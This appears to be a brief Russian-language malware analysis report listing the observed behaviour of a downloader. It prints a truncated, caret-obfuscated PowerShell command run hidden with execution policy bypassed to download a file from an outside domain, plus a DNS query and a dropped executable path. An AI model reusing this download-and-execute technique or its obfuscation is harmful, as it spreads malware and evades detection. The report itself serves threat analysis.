Техническая информация
- http://www.doomgamesoa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^E^Rsh^e^L^l^.^e^Xe -^eX^eCu^tIon^p^O^lIc^Y^ ByPA^s^S -noPROFIL^e^ ^-Windo^WsTY^LE^ HID^D^EN (ne^w-^ObJECt^ sYS^t^e^M.net.^WEBcLi^en^t)^.doW^nloA^DFi^le('http://www.doomgamesoa....
- DNS ASK do###amesoa.top
- '<SYSTEM32>\cmd.exe' /C "Pow^E^Rsh^e^L^l^.^e^Xe -^eX^eCu^tIon^p^O^lIc^Y^ ByPA^s^S -noPROFIL^e^ ^-Windo^WsTY^LE^ HID^D^EN (ne^w-^ObJECt^ sYS^t^e^M.net.^WEBcLi^en^t)^.doW^nloA^DFi^le('http://www.doomgamesoa....' (со скрытым окном)